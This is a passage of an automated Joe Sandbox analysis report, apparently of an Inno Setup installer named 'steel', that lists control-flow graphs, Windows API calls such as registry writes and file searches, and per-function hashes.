                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                                                            • Instruction ID: afb4f91cf4018cf9acc1c9974f14325182323c15c0e0405bd0f9b005e596376e
                                                                                            • Opcode Fuzzy Hash: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                                                            • Instruction Fuzzy Hash: 03E1AE31700124EFDB04DF69E989AADB7B5FB54300FA440AAE5559B352C73CEE81DB09

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2133 4673a4-4673ba 2134 4673c4-46747b call 49577c call 402b30 * 6 2133->2134 2135 4673bc-4673bf call 402d30 2133->2135 2152 46747d-4674a4 call 41463c 2134->2152 2153 4674b8-4674d1 2134->2153 2135->2134 2157 4674a6 2152->2157 2158 4674a9-4674b3 call 4145fc 2152->2158 2159 4674d3-4674fa call 41461c 2153->2159 2160 46750e-46751c call 495a84 2153->2160 2157->2158 2158->2153 2166 4674ff-467509 call 4145dc 2159->2166 2167 4674fc 2159->2167 2168 46751e-46752d call 4958cc 2160->2168 2169 46752f-467531 call 4959f0 2160->2169 2166->2160 2167->2166 2174 467536-467589 call 4953e0 call 41a3d0 * 2 2168->2174 2169->2174 2181 46759a-4675af call 451458 call 414b18 2174->2181 2182 46758b-467598 call 414b18 2174->2182 2188 4675b4-4675bb 2181->2188 2182->2188 2189 467603-467a89 call 49581c call 495b40 call 41461c * 3 call 4146bc call 4145dc * 3 call 460bfc call 460c14 call 460c20 call 460c68 call 460bfc call 460c14 call 460c20 call 460c68 call 460c14 call 460c68 LoadBitmapA call 41d6b0 call 460c38 call 460c50 call 467180 call 468c94 call 466800 call 40357c call 414b18 call 466b38 call 466b40 call 466800 call 40357c * 2 call 414b18 call 468c94 call 466800 call 414b18 call 466b38 call 466b40 call 414b18 * 2 call 468c94 call 414b18 * 2 call 466b38 call 4145fc call 466b38 call 4145fc call 468c94 call 414b18 call 466b38 call 466b40 call 468c94 call 414b18 call 466b38 call 4145fc * 2 call 414b18 call 466b38 call 4145fc 2188->2189 2190 4675bd-4675fe call 4146bc call 414700 call 420f98 call 420fc4 call 420b68 call 420b94 2188->2190 2320 467ae5-467afe call 414a44 * 2 2189->2320 2321 467a8b-467ae3 call 4145fc call 414b18 call 466b38 call 4145fc 2189->2321 2190->2189 2328 467b03-467bb4 call 466800 call 468c94 call 466800 call 414b18 call 495b40 call 466b38 2320->2328 2321->2328 2347 467bb6-467bd1 2328->2347 2348 467bee-467e24 call 466800 call 414b18 call 495b50 * 2 call 42e8c0 call 4145fc call 466b38 call 4145fc call 4181e0 call 42ed38 call 414b18 call 49581c call 495b40 call 41461c call 466800 call 414b18 call 466b38 call 4145fc call 466800 call 468c94 call 466800 call 414b18 call 466b38 call 4145fc call 466b40 call 466800 call 414b18 call 466b38 2328->2348 2349 467bd6-467be9 call 4145fc 2347->2349 2350 467bd3 2347->2350 2409 467e26-467e2f 2348->2409 2410 467e65-467f1e call 466800 call 468c94 call 466800 call 414b18 call 495b40 call 466b38 2348->2410 2349->2348 2350->2349 2409->2410 2411 467e31-467e60 call 414a44 call 466b40 2409->2411 2428 467f20-467f3b 2410->2428 2429 467f58-468379 call 466800 call 414b18 call 495b50 * 2 call 42e8c0 call 4145fc call 466b38 call 4145fc call 414b18 call 49581c call 495b40 call 41461c call 414b18 call 466800 call 468c94 call 466800 call 414b18 call 466b38 call 466b40 call 42bbd0 call 495b50 call 44e8b0 call 466800 call 468c94 call 466800 call 468c94 call 466800 call 468c94 * 2 call 414b18 call 466b38 call 466b40 call 468c94 call 4953e0 call 41a3d0 call 466800 call 40357c call 414b18 call 466b38 call 4145fc call 414b18 * 2 call 495b50 call 403494 call 40357c * 2 call 414b18 2410->2429 2411->2410 2430 467f40-467f53 call 4145fc 2428->2430 2431 467f3d 2428->2431 2528 46839d-4683a4 2429->2528 2529 46837b-468398 call 44ffdc call 450138 2429->2529 2430->2429 2431->2430 2531 4683a6-4683c3 call 44ffdc call 450138 2528->2531 2532 4683c8-4683cf 2528->2532 2529->2528 2531->2532 2534 4683f3-468439 call 4181e0 GetSystemMenu AppendMenuA call 403738 AppendMenuA call 468d88 2532->2534 2535 4683d1-4683ee call 44ffdc call 450138 2532->2535 2549 468453 2534->2549 2550 46843b-468442 2534->2550 2535->2534 2553 468455-468464 2549->2553 2551 468444-46844d 2550->2551 2552 46844f-468451 2550->2552 2551->2549 2551->2552 2552->2553 2554 468466-46846d 2553->2554 2555 46847e 2553->2555 2556 46846f-468478 2554->2556 2557 46847a-46847c 2554->2557 2558 468480-46849a 2555->2558 2556->2555 2556->2557 2557->2558 2559 468543-46854a 2558->2559 2560 4684a0-4684a9 2558->2560 2563 468550-468573 call 47c26c call 403450 2559->2563 2564 4685dd-4685eb call 414b18 2559->2564 2561 468504-46853e call 414b18 * 3 2560->2561 2562 4684ab-468502 call 47c26c call 414b18 call 47c26c call 414b18 call 47c26c call 414b18 2560->2562 2561->2559 2562->2559 2583 468584-468598 call 403494 2563->2583 2584 468575-468582 call 47c440 2563->2584 2570 4685f0-4685f9 2564->2570 2574 4685ff-468617 call 429fd8 2570->2574 2575 468709-468738 call 42b96c call 44e83c 2570->2575 2592 46868e-468692 2574->2592 2593 468619-46861d 2574->2593 2609 4687e6-4687ea 2575->2609 2610 46873e-468742 2575->2610 2605 4685aa-4685db call 42c804 call 42cbc0 call 403494 call 414b18 2583->2605 2606 46859a-4685a5 call 403494 2583->2606 2584->2605 2598 468694-46869d 2592->2598 2599 4686e2-4686e6 2592->2599 2600 46861f-468659 call 40b24c call 47c26c 2593->2600 2598->2599 2607 46869f-4686aa 2598->2607 2603 4686fa-468704 call 42a05c 2599->2603 2604 4686e8-4686f8 call 42a05c 2599->2604 2660 46865b-468662 2600->2660 2661 468688-46868c 2600->2661 2603->2575 2604->2575 2605->2570 2606->2605 2607->2599 2619 4686ac-4686b0 2607->2619 2612 4687ec-4687f3 2609->2612 2613 468869-46886d 2609->2613 2611 468744-468756 call 40b24c 2610->2611 2639 468788-4687bf call 47c26c call 44cb0c 2611->2639 2640 468758-468786 call 47c26c call 44cbdc 2611->2640 2612->2613 2622 4687f5-4687fc 2612->2622 2623 4688d6-4688df 2613->2623 2624 46886f-468886 call 40b24c 2613->2624 2628 4686b2-4686d5 call 40b24c call 406ac4 2619->2628 2622->2613 2633 4687fe-468809 2622->2633 2631 4688e1-4688f9 call 40b24c call 4699fc 2623->2631 2632 4688fe-468913 call 466ee0 call 466c5c 2623->2632 2654 4688c6-4688d4 call 4699fc 2624->2654 2655 468888-4688c4 call 40b24c call 4699fc * 2 call 46989c 2624->2655 2671 4686d7-4686da 2628->2671 2672 4686dc-4686e0 2628->2672 2631->2632 2685 468965-46896f call 414a44 2632->2685 2686 468915-468938 call 42a040 call 40b24c 2632->2686 2633->2632 2642 46880f-468813 2633->2642 2687 4687c4-4687c8 2639->2687 2640->2687 2653 468815-46882b call 40b24c 2642->2653 2682 46885e-468862 2653->2682 2683 46882d-468859 call 42a05c call 4699fc call 46989c 2653->2683 2654->2632 2655->2632 2660->2661 2673 468664-468676 call 406ac4 2660->2673 2661->2592 2661->2600 2671->2599 2672->2599 2672->2628 2673->2661 2696 468678-468682 2673->2696 2682->2653 2688 468864 2682->2688 2683->2632 2697 468974-468993 call 414a44 2685->2697 2711 468943-468952 call 414a44 2686->2711 2712 46893a-468941 2686->2712 2694 4687d3-4687d5 2687->2694 2695 4687ca-4687d1 2687->2695 2688->2632 2701 4687dc-4687e0 2694->2701 2695->2694 2695->2701 2696->2661 2702 468684 2696->2702 2713 468995-4689b8 call 42a040 call 469b5c 2697->2713 2714 4689bd-4689e0 call 47c26c call 403450 2697->2714 2701->2609 2701->2611 2702->2661 2711->2697 2712->2711 2717 468954-468963 call 414a44 2712->2717 2713->2714 2730 4689e2-4689eb 2714->2730 2731 4689fc-468a05 2714->2731 2717->2697 2730->2731 2732 4689ed-4689fa call 47c440 2730->2732 2733 468a07-468a19 call 403684 2731->2733 2734 468a1b-468a2b call 403494 2731->2734 2741 468a3d-468a54 call 414b18 2732->2741 2733->2734 2742 468a2d-468a38 call 403494 2733->2742 2734->2741 2746 468a56-468a5d 2741->2746 2747 468a8a-468a94 call 414a44 2741->2747 2742->2741 2748 468a5f-468a68 2746->2748 2749 468a6a-468a74 call 42b0e4 2746->2749 2753 468a99-468abe call 403400 * 3 2747->2753 2748->2749 2751 468a79-468a88 call 414a44 2748->2751 2749->2751 2751->2753
                                                                                            APIs
                                                                                              • Part of subcall function 004958CC: GetWindowRect.USER32(00000000), ref: 004958E2
                                                                                            • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00467773
                                                                                              • Part of subcall function 0041D6B0: GetObjectA.GDI32(?,00000018,0046778D), ref: 0041D6DB
                                                                                              • Part of subcall function 00467180: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                                              • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                                              • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                                              • Part of subcall function 00466B40: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                                              • Part of subcall function 00495B50: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00495B5A
                                                                                              • Part of subcall function 0042ED38: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                                              • Part of subcall function 0042ED38: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                              • Part of subcall function 0049581C: GetDC.USER32(00000000), ref: 0049583E
                                                                                              • Part of subcall function 0049581C: SelectObject.GDI32(?,00000000), ref: 00495864
                                                                                              • Part of subcall function 0049581C: ReleaseDC.USER32(00000000,?), ref: 004958B5
                                                                                              • Part of subcall function 00495B40: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00495B4A
                                                                                            • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,0213FC50,02141948,?,?,02141978,?,?,021419C8,?), ref: 004683FD
                                                                                            • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0046840E
                                                                                            • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00468426
                                                                                              • Part of subcall function 0042A05C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A072
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$AppendExtractIconObject$AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectReleaseSelectSendSystemUserWindow
                                                                                            • String ID: $(Default)$STOPIMAGE$%H
                                                                                            • API String ID: 3231140908-2624782221
                                                                                            • Opcode ID: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                                                            • Instruction ID: 1a3196d4b4984e68f3522cc8585b165e0004af585c118fa25862355e2bbb38c0
                                                                                            • Opcode Fuzzy Hash: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                                                            • Instruction Fuzzy Hash: 95F2C6346005248FCB00EF69D9D9F9973F1BF49304F1582BAE5049B36ADB74AC46CB9A
                                                                                            APIs
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 00474FE1
                                                                                            • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750BE
                                                                                            • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750CC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                            • String ID: unins$unins???.*
                                                                                            • API String ID: 3541575487-1009660736
                                                                                            • Opcode ID: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                                                            • Instruction ID: 191fa049ef1442540897bd6b232d6b1da598bf4afdbbee48782243349675ce5a
                                                                                            • Opcode Fuzzy Hash: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                                                            • Instruction Fuzzy Hash: 95315074A00548ABCB10EB65CD81BDEB7A9DF45304F50C0B6E40CAB3A2DB789F418B59
                                                                                            APIs
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452A9D
                                                                                            • GetLastError.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452AA5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileFindFirstLast
                                                                                            • String ID:
                                                                                            • API String ID: 873889042-0
                                                                                            • Opcode ID: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                                            • Instruction ID: 3e58272229af866f17ac5928e9872a720c3be2d4903e778e839a846eb7d55d53
                                                                                            • Opcode Fuzzy Hash: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                                            • Instruction Fuzzy Hash: 94F0F971A04604AB8B10EF669D4149EF7ACEB8672571046BBFC14E3282DAB84E0485A8
                                                                                            APIs
                                                                                            • GetVersion.KERNEL32(?,0046E17A), ref: 0046E0EE
                                                                                            • CoCreateInstance.OLE32(00499B98,00000000,00000001,00499BA8,?,?,0046E17A), ref: 0046E10A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateInstanceVersion
                                                                                            • String ID:
                                                                                            • API String ID: 1462612201-0
                                                                                            • Opcode ID: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
                                                                                            • Instruction ID: e32462cabb755f907f5de1887460af807d545ab7c9798ff14e002636b2035e3f
                                                                                            • Opcode Fuzzy Hash: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
                                                                                            • Instruction Fuzzy Hash: 90F0A7352812009FEB10975ADC86B8937C47B22315F50007BE04497292D2BD94C0471F
                                                                                            APIs
                                                                                            • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoLocale
                                                                                            • String ID:
                                                                                            • API String ID: 2299586839-0
                                                                                            • Opcode ID: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                                            • Instruction ID: 8daab3ef8e56b0da8b8c23f45c5b5388ad46b50bd825570c2d348c61856efc62
                                                                                            • Opcode Fuzzy Hash: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                                            • Instruction Fuzzy Hash: BFE0223170021466C311AA2A9C86AEAB34C9758310F00427FB904E73C2EDB89E4042A8
                                                                                            APIs
                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424151,?,00000000,0042415C), ref: 00423BAE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: NtdllProc_Window
                                                                                            • String ID:
                                                                                            • API String ID: 4255912815-0
                                                                                            • Opcode ID: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                                                            • Instruction ID: a748582893d7571d6ac8bdbe819d0a8fbf5f36db2d3505b6f19a51c7a0bbae16
                                                                                            • Opcode Fuzzy Hash: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                                                            • Instruction Fuzzy Hash: 47F0B979205608AF8B40DF99C588D4ABBE8AB4C260B058195B988CB321C234ED808F90
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: NameUser
                                                                                            • String ID:
                                                                                            • API String ID: 2645101109-0
                                                                                            • Opcode ID: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                                                            • Instruction ID: 9f318ec9847dd9a6abcb639c8bc611599857aea0b867fcad4bfaeec6bdb042bf
                                                                                            • Opcode Fuzzy Hash: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                                                            • Instruction Fuzzy Hash: 8FD0C27230470473CB00AA689C825AA35CD8B84305F00483E3CC5DA2C3FABDDA485756
                                                                                            APIs
                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F53C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: NtdllProc_Window
                                                                                            • String ID:
                                                                                            • API String ID: 4255912815-0
                                                                                            • Opcode ID: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                                                            • Instruction ID: 7ca9c19e24a5def9c493c34941f9da96f9ca037215ec7a65a90973bf7a04e639
                                                                                            • Opcode Fuzzy Hash: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                                                            • Instruction Fuzzy Hash: FCD09E7120011D7B9B00DE99E840D6B33AD9B88710B909925F945D7642D634ED9197A5

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 844 46f058-46f08a 845 46f0a7 844->845 846 46f08c-46f093 844->846 847 46f0ae-46f0e6 call 403634 call 403738 call 42dec0 845->847 848 46f095-46f09c 846->848 849 46f09e-46f0a5 846->849 856 46f101-46f12a call 403738 call 42dde4 847->856 857 46f0e8-46f0fc call 403738 call 42dec0 847->857 848->845 848->849 849->847 865 46f12c-46f135 call 46ed28 856->865 866 46f13a-46f163 call 46ee44 856->866 857->856 865->866 870 46f175-46f178 call 403400 866->870 871 46f165-46f173 call 403494 866->871 875 46f17d-46f1c8 call 46ee44 call 42c3fc call 46ee8c call 46ee44 870->875 871->875 884 46f1de-46f1ff call 45559c call 46ee44 875->884 885 46f1ca-46f1dd call 46eeb4 875->885 892 46f255-46f25c 884->892 893 46f201-46f254 call 46ee44 call 431404 call 46ee44 call 431404 call 46ee44 884->893 885->884 894 46f25e-46f29b call 431404 call 46ee44 call 431404 call 46ee44 892->894 895 46f29c-46f2a3 892->895 893->892 894->895 897 46f2e4-46f309 call 40b24c call 46ee44 895->897 898 46f2a5-46f2e3 call 46ee44 * 3 895->898 919 46f30b-46f316 call 47c26c 897->919 920 46f318-46f321 call 403494 897->920 898->897 929 46f326-46f331 call 478e04 919->929 920->929 934 46f333-46f338 929->934 935 46f33a 929->935 936 46f33f-46f509 call 403778 call 46ee44 call 47c26c call 46ee8c call 403494 call 40357c * 2 call 46ee44 call 403494 call 40357c * 2 call 46ee44 call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c 934->936 935->936 999 46f51f-46f52d call 46eeb4 936->999 1000 46f50b-46f51d call 46ee44 936->1000 1004 46f532 999->1004 1005 46f533-46f57c call 46eeb4 call 46eee8 call 46ee44 call 47c26c call 46ef4c 1000->1005 1004->1005 1016 46f5a2-46f5af 1005->1016 1017 46f57e-46f5a1 call 46eeb4 * 2 1005->1017 1019 46f5b5-46f5bc 1016->1019 1020 46f67e-46f685 1016->1020 1017->1016 1021 46f5be-46f5c5 1019->1021 1022 46f629-46f638 1019->1022 1023 46f687-46f6bd call 494cec 1020->1023 1024 46f6df-46f6f5 RegCloseKey 1020->1024 1021->1022 1026 46f5c7-46f5eb call 430bcc 1021->1026 1029 46f63b-46f648 1022->1029 1023->1024 1026->1029 1039 46f5ed-46f5ee 1026->1039 1030 46f65f-46f678 call 430c08 call 46eeb4 1029->1030 1031 46f64a-46f657 1029->1031 1042 46f67d 1030->1042 1031->1030 1035 46f659-46f65d 1031->1035 1035->1020 1035->1030 1041 46f5f0-46f616 call 40b24c call 479630 1039->1041 1047 46f623-46f625 1041->1047 1048 46f618-46f61e call 430bcc 1041->1048 1042->1020 1047->1041 1050 46f627 1047->1050 1048->1047 1050->1029
                                                                                            APIs
                                                                                              • Part of subcall function 0046EE44: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                                                              • Part of subcall function 0046EEB4: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                                                            • RegCloseKey.ADVAPI32(?,0046F6FD,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F748,?,?,0049C1E0,00000000), ref: 0046F6F0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value$Close
